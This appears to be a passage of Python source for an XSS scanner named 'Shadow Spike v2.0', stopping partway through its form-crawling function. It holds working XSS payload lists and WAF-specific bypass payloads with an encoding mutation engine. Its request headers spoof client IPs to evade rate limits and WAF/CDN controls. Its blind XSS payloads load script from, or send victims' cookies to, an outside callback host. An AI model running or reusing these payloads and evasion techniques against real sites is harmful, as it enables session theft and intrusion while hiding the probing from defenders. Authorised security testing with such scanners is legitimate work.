"""
XSS Scanner Service - Shadow Spike v2.0
"Guaranteed Find" Upgrade — Multi-page spider, Reflected + Stored + DOM + Header + Blind XSS detection.
Parameter brute-force, WAF detection & bypass, smart encoding mutations.
"""
import asyncio
import logging
import re
import time
import random
import html as html_lib
from typing import List, Dict, Any, Optional, Callable, Set
from urllib.parse import urlparse, urljoin, urlencode, parse_qs, urlunparse, quote, unquote

import httpx
from bs4 import BeautifulSoup

from app.services.xss_payloads import XSS_PAYLOADS

logger = logging.getLogger(__name__)

SKIP_INPUT_TYPES = {
    "submit", "button", "image", "file", "reset",
    "checkbox", "radio", "color", "range", "date",
    "datetime-local", "month", "time", "week",
}

# ── Common injectable parameter names for brute-force discovery ───────────────
COMMON_PARAMS = [
    "q", "s", "search", "query", "keyword", "term", "find", "lookup",
    "id", "page", "p", "pg", "name", "user", "username", "email",
    "input", "text", "value", "data", "msg", "message", "comment",
    "url", "redirect", "next", "return", "goto", "callback", "redir",
    "continue", "dest", "destination", "to", "from", "ref", "referrer",
    "file", "path", "dir", "folder", "cat", "category", "tag",
    "title", "content", "body", "desc", "description", "summary",
    "error", "err", "debug", "test", "action", "type", "cmd", "command",
    "sort", "order", "orderby", "filter", "status", "state",
    "lang", "language", "locale", "region", "country",
    "source", "src", "utm_source", "utm_campaign", "utm_medium",
    "template", "tpl", "view", "display", "render", "output",
    "format", "mode", "style", "class", "theme",
    "html", "code", "token", "key", "api", "api_key",
    "jsonp", "callback", "cb", "fn", "func", "function",
    "img", "image", "icon", "avatar", "photo", "pic",
    "link", "href", "site", "website", "domain",
    "preview", "embed", "iframe", "frame",
    "success", "fail", "info", "warning", "alert", "notice",
    "r", "u", "v", "w", "x", "item", "product", "article",
    "post", "blog", "topic", "thread", "reply", "answer",
    "tab", "section", "panel", "widget", "module",
    "edit", "update", "delete", "remove", "add", "create",
]

# ── WAF Signature Database ────────────────────────────────────────────────────
WAF_SIGNATURES = {
    "cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "__cfduid", "cf-request-id"],
        "body": ["cloudflare", "attention required", "cf-browser-verification"],
        "status_codes": [403, 503],
    },
    "akamai": {
        "headers": ["x-akamai-transformed", "akamai-grn"],
        "body": ["akamai", "access denied", "reference #"],
        "status_codes": [403],
    },
    "imperva": {
        "headers": ["x-cdn", "x-iinfo"],
        "body": ["incapsula", "imperva", "incident id"],
        "status_codes": [403],
    },
    "modsecurity": {
        "headers": [],
        "body": ["modsecurity", "mod_security", "not acceptable", "406 not acceptable"],
        "status_codes": [403, 406],
    },
    "aws_waf": {
        "headers": ["x-amzn-requestid", "x-amz-cf-id"],
        "body": ["aws", "request blocked", "automated requests"],
        "status_codes": [403],
    },
    "sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "body": ["sucuri", "access denied - sucuri"],
        "status_codes": [403],
    },
    "wordfence": {
        "headers": [],
        "body": ["wordfence", "generated by wordfence", "a potentially unsafe operation"],
        "status_codes": [403, 503],
    },
}

# ── Smart dummy values by field name/type/placeholder ─────────────────────────
def smart_fill(name: str, field_type: str, placeholder: str) -> str:
    """Return a realistic dummy value based on field name/type/placeholder."""
    key = (name + " " + placeholder).lower()
    if field_type in ("email",) or any(k in key for k in ["email", "mail"]):
        return "test@example.com"
    if field_type == "tel" or any(k in key for k in ["phone", "mobile", "tel", "contact"]):
        return "9876543210"
    if field_type == "number" or any(k in key for k in ["age", "zip", "pincode", "postal", "qty", "quantity", "count"]):
        return "25"
    if field_type == "url" or any(k in key for k in ["url", "website", "link", "site"]):
        return "http://example.com"
    if any(k in key for k in ["user", "username", "login", "uname"]):
        return "testuser"
    if any(k in key for k in ["pass", "password", "pwd", "secret"]):
        return "Test@1234"
    if any(k in key for k in ["first", "last", "full", "name"]):
        return "John Doe"
    if any(k in key for k in ["city", "state", "country", "address", "addr"]):
        return "TestCity"
    if any(k in key for k in ["message", "comment", "body", "content", "desc", "review"]):
        return "This is a test message"
    if any(k in key for k in ["subject", "title", "topic"]):
        return "Test Subject"
    if any(k in key for k in ["code", "coupon", "promo", "otp"]):
        return "TEST123"
    if any(k in key for k in ["amount", "price", "cost", "salary"]):
        return "100"
    return "test"


# ── DOM Sink patterns that indicate DOM-XSS risk ─────────────────────────────
DOM_SINKS = [
    r"innerHTML\s*=",
    r"outerHTML\s*=",
    r"document\.write\s*\(",
    r"document\.writeln\s*\(",
    r"\.insertAdjacentHTML\s*\(",
    r"eval\s*\(",
    r"setTimeout\s*\(\s*['\"]",
    r"setInterval\s*\(\s*['\"]",
    r"new\s+Function\s*\(",
    r"location\.href\s*=",
    r"location\.replace\s*\(",
    r"location\.assign\s*\(",
    r"window\.location\s*=",
    r"src\s*=\s*location",
    r"\$\(.*\)\.html\s*\(",   # jQuery .html()
    r"\.append\s*\(.*html",
]

# ── DOM Source patterns (user-controlled input) ───────────────────────────────
DOM_SOURCES = [
    r"location\.search",
    r"location\.hash",
    r"location\.href",
    r"document\.referrer",
    r"document\.URL",
    r"document\.cookie",
    r"window\.name",
    r"localStorage\.getItem",
    r"sessionStorage\.getItem",
]

# ── QUICK mode payloads – maximum coverage, minimum requests ──────────────────
QUICK_PAYLOADS = [
    # Standard
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    '"><script>alert(1)</script>',
    "'><script>alert(1)</script>",
    '"><img src=x onerror=alert(1)>',
    '"><svg onload=alert(1)>',
    # No < > needed – attribute injection
    "\" autofocus onfocus=\"alert(1)",
    "' autofocus onfocus='alert(1)",
    "\" onmouseover=\"alert(1)",
    "\" onpointerenter=\"alert(1)",
    "'-alert(1)-'",
    "\"-alert(1)-\"",
    "';alert(1)//",
    "\";alert(1)//",
    # JS URI
    "javascript:alert(1)",
    "javascript:prompt(1)",
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    # Encoding bypasses
    "%3Cscript%3Ealert(1)%3C/script%3E",
    "%253Cscript%253Ealert(1)%253C/script%253E",
    "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
    # Case / whitespace bypass
    "<ScRiPt>alert(1)</ScRiPt>",
    "<img/src=x/onerror=alert(1)>",
    "<img src=x\tonerror=alert(1)>",
    "<img src=x\nonerror=alert(1)>",
    "jAvAsCrIpT:alert(1)",
    # Obscure tags
    "<details open ontoggle=alert(1)>",
    "<input autofocus onfocus=alert(1)>",
    "<svg><animate onbegin=alert(1) attributeName=x></svg>",
    "<iframe srcdoc=<script>alert(1)</script>>",
    "<marquee onstart=alert(1)>",
    "<math><mtext></p><img src=1 onerror=alert(1)></math>",
    # Polyglot
    "\"><><script>alert(1)</script>",
    "\" onclick=alert(1)//<button '",
    "<comment><img src=</comment><img src=x onerror=alert(1)>",
    # Function obfuscation
    "<script>window['ale'+'rt'](1)</script>",
    "<script>Function('ale'+'rt(1)')()</script>",
    "<img src=x onerror=this.onerror=alert;throw 1>",
    # Template injection
    "{{constructor.constructor('alert(1)')()}}",
    "{{$on.constructor('alert(1)')()}}",
    # Context breakouts
    "</textarea><script>alert(1)</script>",
    "</title><script>alert(1)</script>",
    "</noscript><script>alert(1)</script>",
    "</template><script>alert(1)</script>",
    # Nested/Comment bypasses
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    "<img src=x o<!---->nerror=alert(1)>",
    "<script>alert/**/(1)</script>",
]


# ── Header names to test for injection ────────────────────────────────────────
INJECTABLE_HEADERS = [
    "User-Agent",
    "Referer",
    "X-Forwarded-For",
    "X-Custom-Header",
    "Accept-Language",
    "X-Forwarded-Host",
    "X-Original-URL",
    "X-Rewrite-URL",
]

# ── Blind XSS callback payloads ──────────────────────────────────────────────
BLIND_XSS_PAYLOADS = [
    '"><script src=//shadow-spike-callback.local/xss.js></script>',
    "'><script src=//shadow-spike-callback.local/xss.js></script>",
    '<img src=x onerror="var s=document.createElement(\'script\');s.src=\'//shadow-spike-callback.local/xss.js\';document.body.appendChild(s)">',
    '"><img src=x onerror=fetch(`//shadow-spike-callback.local/log?c=${document.cookie}`)>',
    "<script>fetch('//shadow-spike-callback.local/log?d='+btoa(document.cookie))</script>",
]


def get_spoofed_headers() -> Dict[str, str]:
    """Generate dynamic headers to bypass rate limiting and spoof IP."""
    ip = f"{random.randint(11, 255)}.{random.randint(0, 255)}.{random.randint(0, 255)}.{random.randint(0, 255)}"
    
    # Modern, highly varied User-Agents
    user_agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0",
        "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1",
        "Mozilla/5.0 (Linux; Android 14; SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.113 Mobile Safari/537.36"
    ]
    
    headers = {
        "User-Agent": random.choice(user_agents),
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": f"{random.choice(['en-US,en;q=0.9', 'en-GB,en;q=0.9', 'es-ES,es;q=0.8'])}",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Sec-CH-UA-Mobile": "?0",
        "Sec-CH-UA-Platform": "\"Windows\"",
        "Cache-Control": "max-age=0",
        
        # Comprehensive IP Spoofing Headers for WAF/CDN Evasion
        "X-Forwarded-For": ip,
        "X-Originating-IP": ip,
        "X-Remote-IP": ip,
        "X-Remote-Addr": ip,
        "X-Client-IP": ip,
        "Client-IP": ip,
        "True-Client-IP": ip,
        "X-Real-IP": ip,
        "CF-Connecting-IP": ip,           # Cloudflare bypass
        "Fastly-Client-IP": ip,           # Fastly bypass
        "X-Cluster-Client-IP": ip,        # Rackspace bypass
        "X-Forwarded": ip,
        "Forwarded-For": ip,
        "Forwarded": f"for={ip};proto=http;by={ip}",
        
        # Cache Evasion (forces WAF/Server to treat request as new)
        "Pragma": "no-cache",
        "Cache-Control": "no-store, no-cache, must-revalidate, proxy-revalidate",
    }
    
    # Randomize Referer to bypass anti-CSRF / hotlink protections occasionally
    if random.random() > 0.5:
        headers["Referer"] = random.choice([
            "https://www.google.com/",
            "https://www.bing.com/",
            "https://duckduckgo.com/",
            "https://yandex.com/"
        ])

    return headers


TIMEOUT = httpx.Timeout(20.0, connect=10.0)
PROBE_TOKEN = "SHDWSPK9z"


# ─── Helpers ──────────────────────────────────────────────────────────────────

def normalize_url(url: str) -> str:
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")


def get_base_url(url: str) -> str:
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}"


def inject_param(url: str, param: str, value: str) -> str:
    parsed = urlparse(url)
    params = parse_qs(parsed.query, keep_blank_values=True)
    params[param] = [value]
    return urlunparse(parsed._replace(query=urlencode(params, doseq=True)))


def _snippet(text: str, idx: int, length: int) -> str:
    s = max(0, idx - 60)
    e = min(len(text), idx + length + 60)
    return text[s:e].strip()


def detect_context(html: str, probe: str) -> str:
    idx = html.find(probe)
    if idx == -1:
        return "html_body"
    snippet = html[max(0, idx - 300): idx]
    for tag in ["script", "textarea", "style"]:
        if re.search(rf"<{tag}[^>]*>", snippet, re.I):
            close = snippet.rfind(f"</{tag}>")
            open_ = snippet.rfind(f"<{tag}")
            if open_ > close:
                return tag
    last_lt = snippet.rfind("<")
    last_gt = snippet.rfind(">")
    if last_lt > last_gt:
        return "attribute"
    return "html_body"


def check_reflection(resp_text: str, payload: str) -> Dict[str, Any]:
    # 1. Exact
    if payload in resp_text:
        idx = resp_text.find(payload)
        return {"reflected": True, "confidence": "HIGH", "evidence": _snippet(resp_text, idx, len(payload))}
    # 2. Case-insensitive
    if payload.lower() in resp_text.lower():
        idx = resp_text.lower().find(payload.lower())
        return {"reflected": True, "confidence": "HIGH", "evidence": _snippet(resp_text, idx, len(payload))}
    # 3. URL encoded
    enc = quote(payload)
    if enc in resp_text:
        idx = resp_text.find(enc)
        return {"reflected": True, "confidence": "MEDIUM", "evidence": _snippet(resp_text, idx, len(enc))}
    # 4. Core parts
    for part in ["alert(1)", "onerror=", "onload=", "onfocus=", "YWxlcnQoMSk="]:
        if part in payload and part in resp_text:
            idx = resp_text.find(part)
            return {"reflected": True, "confidence": "MEDIUM", "evidence": _snippet(resp_text, idx, len(part))}
    return {"reflected": False, "confidence": None, "evidence": None}


def build_context_payloads(payload: str, context: str) -> List[str]:
    base = [payload]
    if context == "attribute":
        base += [
            '"><script>alert(1)</script>', "'><script>alert(1)</script>",
            '" onerror=alert(1) "', "' onerror=alert(1) '",
            '"><img src=x onerror=alert(1)>', '"><svg onload=alert(1)>',
            '" autofocus onfocus="alert(1)', "' autofocus onfocus='alert(1)",
        ]
    elif context == "textarea":
        base += [
            "</textarea><script>alert(1)</script>",
            "</textarea><img src=x onerror=alert(1)>",
            "</textarea><svg onload=alert(1)>",
        ]
    elif context == "script":
        base += ["</script><script>alert(1)</script>", "';alert(1)//", '";alert(1)//', "-alert(1)-", "};alert(1)//"]
    elif context == "style":
        base += ["</style><script>alert(1)</script>", "</style><img src=x onerror=alert(1)>"]
    else:  # html_body
        base += ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>", "<svg onload=alert(1)>",
                 "<details open ontoggle=alert(1)>", "<input autofocus onfocus=alert(1)>"]
    seen, result = set(), []
    for p in base:
        if p not in seen:
            seen.add(p)
            result.append(p)
    return result


def check_dom_xss(html: str, url: str) -> Optional[Dict[str, Any]]:
    """Detect DOM-based XSS by finding dangerous sink+source combos in JS."""
    scripts = re.findall(r"<script[^>]*>(.*?)</script>", html, re.DOTALL | re.IGNORECASE)
    all_js = "\n".join(scripts)

    found_sinks = [p for p in DOM_SINKS if re.search(p, all_js, re.IGNORECASE)]
    found_sources = [p for p in DOM_SOURCES if re.search(p, all_js, re.IGNORECASE)]

    if found_sinks and found_sources:
        sink_match = re.search(found_sinks[0], all_js, re.IGNORECASE)
        evidence = all_js[max(0, sink_match.start()-80): sink_match.start()+120].strip() if sink_match else ""
        sink_clean = found_sinks[0].replace(r'\s*', '')
        return {
            "endpoint": url,
            "parameter": "DOM",
            "field_label": "DOM Sink",
            "location_summary": f"{url} -> DOM Sink: {sink_clean}",
            "vulnerable_url": url,
            "method": "GET",
            "context_type": "dom",
            "payload": f"Source: {found_sources[0]}  ->  Sink: {found_sinks[0]}",
            "confidence": "MEDIUM",
            "severity": "HIGH",
            "evidence": evidence[:300],
            "impact": "DOM-based XSS: attacker-controlled data flows into a dangerous JavaScript sink. Can lead to script execution without server involvement.",
            "xss_type": "dom",
        }
    return None


# ─── NEW: WAF Detection & Bypass ─────────────────────────────────────────────

async def detect_waf(client: httpx.AsyncClient, url: str) -> Dict[str, Any]:
    """
    Detect WAF by sending a malicious payload and analyzing the response.
    Returns: {"detected": bool, "waf_name": str|None, "confidence": str}
    """
    test_payloads = [
        "<script>alert(1)</script>",
        "' OR 1=1 --",
        "../../../etc/passwd",
    ]
    
    waf_scores: Dict[str, int] = {}
    
    for payload in test_payloads:
        try:
            test_url = f"{url}?waftest={quote(payload)}"
            hdrs = get_spoofed_headers()
            resp = await client.get(test_url, headers=hdrs, follow_redirects=True,
                                     timeout=httpx.Timeout(10.0))
            
            resp_headers_lower = {k.lower(): v.lower() for k, v in resp.headers.items()}
            resp_body_lower = resp.text.lower()
            
            for waf_name, sigs in WAF_SIGNATURES.items():
                score = 0
                # Check headers
                for h in sigs["headers"]:
                    if h.lower() in resp_headers_lower:
                        score += 2
                # Check body
                for b in sigs["body"]:
                    if b.lower() in resp_body_lower:
                        score += 3
                # Check status code
                if resp.status_code in sigs["status_codes"]:
                    score += 1
                    
                if score > 0:
                    waf_scores[waf_name] = waf_scores.get(waf_name, 0) + score
                    
        except Exception:
            continue
    
    if waf_scores:
        best_waf = max(waf_scores, key=waf_scores.get)
        confidence = "HIGH" if waf_scores[best_waf] >= 5 else "MEDIUM" if waf_scores[best_waf] >= 3 else "LOW"
        return {"detected": True, "waf_name": best_waf, "confidence": confidence}
    
    return {"detected": False, "waf_name": None, "confidence": None}


# WAF-specific bypass payloads
WAF_BYPASS_PAYLOADS = {
    "cloudflare": [
        "<svg/onload=alert(1)>",
        "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
        "<details open ontoggle=alert(1)>",
        "<svg><animate onbegin=alert(1) attributeName=x></svg>",
        "<math><mtext></p><img src=1 onerror=alert(1)></math>",
        "<a href=\"j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;\">",
        "<svg><script>alert&#40;1&#41;</script>",
    ],
    "akamai": [
        "<img src=x onerror=this.onerror=alert;throw 1>",
        "<input autofocus onfocus=alert(1)>",
        "<marquee onstart=alert(1)>",
        "<script>Function('ale'+'rt(1)')()</script>",
    ],
    "imperva": [
        "<img src=x onerror=Function('ale'+'rt(1)')()>",
        "<svg id=alert(1) onload=eval(id)>",
        "<details/open/ontoggle=alert(1)>",
        "<iframe srcdoc=\"&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;\" />",
    ],
    "modsecurity": [
        "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
        "<svg><script>alert&#40;1&#41;</script></svg>",
        "<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><input autofocus>",
    ],
    "aws_waf": [
        "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
        "<svg/onload=setTimeout(1,alert(1))>",
        "<details open ontoggle=alert(1)>",
    ],
    "sucuri": [
        "<img src=x onerror=this.onerror=alert;throw 1>",
        "<svg><animate onbegin=alert(1) attributeName=x></svg>",
    ],
    "wordfence": [
        "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
        "<details open ontoggle=alert(1)>",
        "<math><mtext></p><img src=1 onerror=alert(1)></math>",
    ],
}


# ─── NEW: Smart Encoding Mutation Engine ──────────────────────────────────────

def mutate_payload(payload: str) -> List[str]:
    """Generate encoding-mutated versions of a payload for WAF bypass."""
    mutations = []
    
    # 1. URL encode
    mutations.append(quote(payload))
    
    # 2. Double URL encode
    mutations.append(quote(quote(payload)))
    
    # 3. HTML entity encode key chars
    html_enc = payload.replace("<", "&lt;").replace(">", "&gt;").replace("\"", "&quot;")
    mutations.append(html_enc)
    
    # 4. Mixed case for tag names
    if "<script>" in payload.lower():
        mutations.append(payload.replace("<script>", "<ScRiPt>").replace("</script>", "</ScRiPt>"))
        mutations.append(payload.replace("<script>", "<SCRIPT>").replace("</script>", "</SCRIPT>"))
    if "<img" in payload.lower():
        mutations.append(payload.replace("<img", "<IMG").replace("onerror", "ONERROR"))
    if "<svg" in payload.lower():
        mutations.append(payload.replace("<svg", "<SVG").replace("onload", "ONLOAD"))
    
    # 5. Null byte injection
    mutations.append(f"%00{payload}")
    mutations.append(payload.replace("<script>", "<scri%00pt>"))
    
    # 6. Tab/newline insertion
    if "onerror" in payload:
        mutations.append(payload.replace("onerror", "onerror\t"))
        mutations.append(payload.replace("onerror", "one\nrror"))
    if "<script>" in payload:
        mutations.append(payload.replace("<script>", "<scr\tipt>"))
    
    # 7. Backtick substitution for quotes
    if "'" in payload or '"' in payload:
        mutations.append(payload.replace("'", "`").replace('"', "`"))
    
    # 8. Unicode escape
    mutations.append(payload.replace("<", "\\u003c").replace(">", "\\u003e"))
    
    # 9. Hex entity encode
    hex_enc = ""
    for c in payload:
        if c in "<>\"'":
            hex_enc += f"&#x{ord(c):x};"
        else:
            hex_enc += c
    mutations.append(hex_enc)
    
    # Deduplicate and remove original
    seen = {payload}
    unique = []
    for m in mutations:
        if m not in seen and m != payload:
            seen.add(m)
            unique.append(m)
    
    return unique


# ─── NEW: Parameter Discovery (Hidden Param Brute-Force) ─────────────────────

async def discover_hidden_params(
    client: httpx.AsyncClient,
    url: str,
    cancel_event: Optional[asyncio.Event] = None,
) -> List[Dict[str, Any]]:
    """
    Brute-force common parameter names against the target URL.
    Returns injection points for parameters that reflect the probe token.
    """
    discovered = []
    base_url = url.split("?")[0]  # strip existing params
    sem = asyncio.Semaphore(20)
    
    async def test_param(param: str):
        if cancel_event and cancel_event.is_set():
            return
        async with sem:
            try:
                test_url = f"{base_url}?{param}={PROBE_TOKEN}"
                resp = await client.get(test_url, headers=get_spoofed_headers(),
                                         follow_redirects=True, timeout=httpx.Timeout(8.0))
                if PROBE_TOKEN in resp.text:
                    discovered.append({
                        "type": "url_param",
                        "url": base_url,
                        "param": param,
                        "label": f"{param} (discovered)",
                        "id": "",
                        "method": "GET",
                        "fields": {},
                        "context": detect_context(resp.text, PROBE_TOKEN),
                        "page_html": resp.text,
                    })
            except Exception:
                pass
    
    await asyncio.gather(*[test_param(p) for p in COMMON_PARAMS])
    return discovered


# ─── NEW: Path Segment Fuzzing ────────────────────────────────────────────────

async def fuzz_path_segments(
    client: httpx.AsyncClient,
    url: str,
    cancel_event: Optional[asyncio.Event] = None,
) -> List[Dict[str, Any]]:
    """
    Inject probe token into URL path segments to find path-based reflections.
    E.g., /search/PAYLOAD/results
    """
    discovered = []
    parsed = urlparse(url)
    segments = [s for s in parsed.path.split("/") if s]
    base = f"{parsed.scheme}://{parsed.netloc}"
    
    sem = asyncio.Semaphore(10)
    
    async def test_segment(idx: int):
        if cancel_event and cancel_event.is_set():
            return
        async with sem:
            try:
                new_segments = segments.copy()
                new_segments[idx] = PROBE_TOKEN
                test_path = "/" + "/".join(new_segments)
                test_url = base + test_path
                resp = await client.get(test_url, headers=get_spoofed_headers(),
                                         follow_redirects=True, timeout=httpx.Timeout(8.0))
                if PROBE_TOKEN in resp.text:
                    discovered.append({
                        "type": "path_segment",
                        "url": test_url,
                        "param": f"path_segment_{idx}",
                        "label": f"Path segment [{idx}]: /{segments[idx]}/",
                        "id": "",
                        "method": "GET",
                        "fields": {},
                        "context": detect_context(resp.text, PROBE_TOKEN),
                        "page_html": resp.text,
                        "original_segment": segments[idx],
                        "segment_index": idx,
                    })
            except Exception:
                pass
    
    if segments:
        await asyncio.gather(*[test_segment(i) for i in range(len(segments))])
    return discovered


# ─── NEW: Header Injection Testing ───────────────────────────────────────────

async def test_header_injection(
    client: httpx.AsyncClient,
    pages: List[str],
    payloads: List[str],
    cancel_event: Optional[asyncio.Event] = None,
    progress_callback: Optional[Callable] = None,
) -> List[Dict[str, Any]]:
    """
    Test if XSS payloads injected via HTTP headers are reflected in the response.
    """
    vulnerabilities = []
    seen: Set[str] = set()
    sem = asyncio.Semaphore(15)
    # Use a subset of payloads for header testing (top 10 most effective)
    header_payloads = payloads[:10] if len(payloads) > 10 else payloads
    
    async def test_one(page_url: str, header_name: str, payload: str):
        if cancel_event and cancel_event.is_set():
            return
        async with sem:
            try:
                hdrs = get_spoofed_headers()
                hdrs[header_name] = payload
                resp = await client.get(page_url, headers=hdrs, follow_redirects=True,
                                         timeout=httpx.Timeout(10.0))
                result = check_reflection(resp.text, payload)
                if result["reflected"]:
                    key = f"header::{header_name}::{page_url}"
                    if key not in seen:
                        seen.add(key)
                        vuln = {
                            "endpoint": page_url,
                            "parameter": header_name,
                            "field_label": f"HTTP Header: {header_name}",
                            "location_summary": f"{page_url} -> Header '{header_name}'",
                            "vulnerable_url": page_url,
                            "method": "GET",
                            "context_type": "header",
                            "payload": payload,
                            "confidence": result["confidence"],
                            "severity": "HIGH" if result["confidence"] == "HIGH" else "MEDIUM",
                            "evidence": result["evidence"],
                            "impact": f"Header-based XSS: the '{header_name}' header value is reflected in the response without sanitization. Attackers can craft malicious links that exploit this via Referer/User-Agent spoofing.",
                            "xss_type": "header",
                            "point_type": "header",
                            "form_fields": None,
                        }
                        vulnerabilities.append(vuln)
            except Exception:
                pass
    
    tasks = []
    # Test only first 5 pages to keep speed reasonable
    for page_url in pages[:5]:
        for header_name in INJECTABLE_HEADERS:
            for payload in header_payloads:
                tasks.append(test_one(page_url, header_name, payload))
    
    if tasks:
        await asyncio.gather(*tasks)
    
    return vulnerabilities


# ─── NEW: JS Endpoint Extraction ─────────────────────────────────────────────

async def extract_js_endpoints(
    client: httpx.AsyncClient,
    pages: List[str],
) -> List[str]:
    """
    Parse JavaScript source files loaded by the pages to discover API endpoints.
    """
    endpoints: Set[str] = set()
    js_urls: Set[str] = set()
    sem = asyncio.Semaphore(10)
    
    # Patterns to find URLs in JS code
    url_patterns = [
        r"""(?:fetch|axios\.get|axios\.post|axios\.put|axios\.delete|XMLHttpRequest)\s*\(\s*['"`]([^'"`\s]+)['"`]""",
        r"""['"`](\/api\/[^'"`\s]+)['"`]""",
        r"""['"`](\/[a-zA-Z0-9_\-\/]+\?[^'"`\s]+)['"`]""",
        r"""(?:url|endpoint|path|route|href)\s*[:=]\s*['"`]([^'"`\s]+)['"`]""",
    ]
    
    async def extract_from_page(page_url: str):
        async with sem:
            try:
                resp = await client.get(page_url, headers=get_spoofed_headers(),
                                         follow_redirects=True, timeout=httpx.Timeout(8.0))
                soup = BeautifulSoup(resp.text, "html.parser")
                base = get_base_url(str(resp.url))
                
                # Collect JS file URLs
                for script in soup.find_all("script", src=True):
                    src = script["src"]
                    full_url = urljoin(str(resp.url), src)
                    if full_url.startswith(base):
                        js_urls.add(full_url)
                
                # Also check inline scripts
                for script in soup.find_all("script"):
                    if script.string:
                        for pattern in url_patterns:
                            for match in re.finditer(pattern, script.string):
                                ep = match.group(1)
                                if ep.startswith("/"):
                                    endpoints.add(urljoin(base, ep))
            except Exception:
                pass
    
    await asyncio.gather(*[extract_from_page(p) for p in pages[:15]])
    
    # Now fetch and parse JS files
    async def parse_js_file(js_url: str):
        async with sem:
            try:
                resp = await client.get(js_url, headers=get_spoofed_headers(),
                                         timeout=httpx.Timeout(8.0))
                base = get_base_url(js_url)
                for pattern in url_patterns:
                    for match in re.finditer(pattern, resp.text):
                        ep = match.group(1)
                        if ep.startswith("/"):
                            endpoints.add(urljoin(base, ep))
            except Exception:
                pass
    
    if js_urls:
        await asyncio.gather(*[parse_js_file(u) for u in list(js_urls)[:20]])
    
    return list(endpoints)


# ─── Spider / Crawler ─────────────────────────────────────────────────────────

async def spider_all_pages(client: httpx.AsyncClient, start_url: str, deep: bool) -> List[str]:
    """Spider the site concurrently and return all unique page URLs."""
    base = get_base_url(start_url)
    visited: set = set()
    max_pages = 60 if deep else 15
    spider_sem = asyncio.Semaphore(10)

    # Seed queue with robots.txt extras
    seed = [start_url]
    try:
        r = await client.get(f"{base}/robots.txt", headers=get_spoofed_headers(), timeout=httpx.Timeout(5.0))
        for line in r.text.splitlines():
            if line.lower().startswith(("allow:", "disallow:")):
                path = line.split(":", 1)[1].strip()
                if path and path != "/" and "*" not in path:
                    seed.append(urljoin(base, path))
    except Exception:
        pass

    async def fetch_links(url: str) -> List[str]:
        async with spider_sem:
            try:
                resp = await client.get(url, headers=get_spoofed_headers(), follow_redirects=True,
                                        timeout=httpx.Timeout(8.0))
                soup = BeautifulSoup(resp.text, "html.parser")
                links = []
                for a in soup.find_all("a", href=True):
                    href = urljoin(str(resp.url), a["href"])
                    if href.startswith(base) and "#" not in href:
                        links.append(href.split("?")[0] if "?" not in a["href"] else href)
                return links
            except Exception:
                return []

    queue = list(set(seed[:max_pages]))
    while queue and len(visited) < max_pages:
        batch = [u for u in queue[:10] if u not in visited]
        queue = queue[10:]
        for u in batch:
            visited.add(u)
        results = await asyncio.gather(*[fetch_links(u) for u in batch])
        for links in results:
            for link in links:
                if link not in visited and len(visited) < max_pages:
                    queue.append(link)

    return list(visited)


async def crawl_injection_points(
    client: httpx.AsyncClient, pages: List[str]
) -> List[Dict[str, Any]]:
    """Extract all injection points from pages — concurrently."""
    points = []
    seen_keys = set()
    crawl_sem = asyncio.Semaphore(10)

    async def process_page(page_url: str):
        async with crawl_sem:
            try:
                resp = await client.get(page_url, headers=get_spoofed_headers(), follow_redirects=True,
                                        timeout=httpx.Timeout(10.0))
                html = resp.text
                actual_url = str(resp.url)
            except Exception as e:
                logger.debug(f"Crawl error {page_url}: {e}")
                return

            soup = BeautifulSoup(html, "html.parser")
            base = get_base_url(actual_url)

            parsed = urlparse(actual_url)
            if parsed.query:
                for param in parse_qs(parsed.query, keep_blank_values=True):
                    key = f"GET::{actual_url}::{param}"
                    if key not in seen_keys:
                        seen_keys.add(key)
                        points.append({
                            "type": "url_param", "url": actual_url, "param": param,
                            "label": param, "id": "", "method": "GET",
                            "fields": {}, "context": "url_param", "page_html": html,
                        })

            for form in soup.find_all("form"):
                action = form.get("action", "")
                method = (form.get("method") or "get").upper()
                form_url = urljoin(actual_url, action) if action else actual_url
                all_fields: Dict[str, str] = {}
                injectable = []
                for tag in form.find_all(["input", "textarea", "select"]):
                    name = tag.get("name") or tag.get("id")
                    if not name:
                        continue
                    tag_type = (tag.get("type") or "text").lower()
                    placeholder = tag.get("placeholder", "")
                    if tag.name == "select":
                        opt = tag.find("option")
                        val = (opt.get("value", "") or opt.get_text(strip=True) or "test") if opt else "test"
                    elif tag.get("value"):
                        val = tag.get("value")
                    else:
                        # Smart fill based on field name/type/placeholder
                        val = smart_fill(name, tag_type, placeholder)
                    all_fields[name] = val
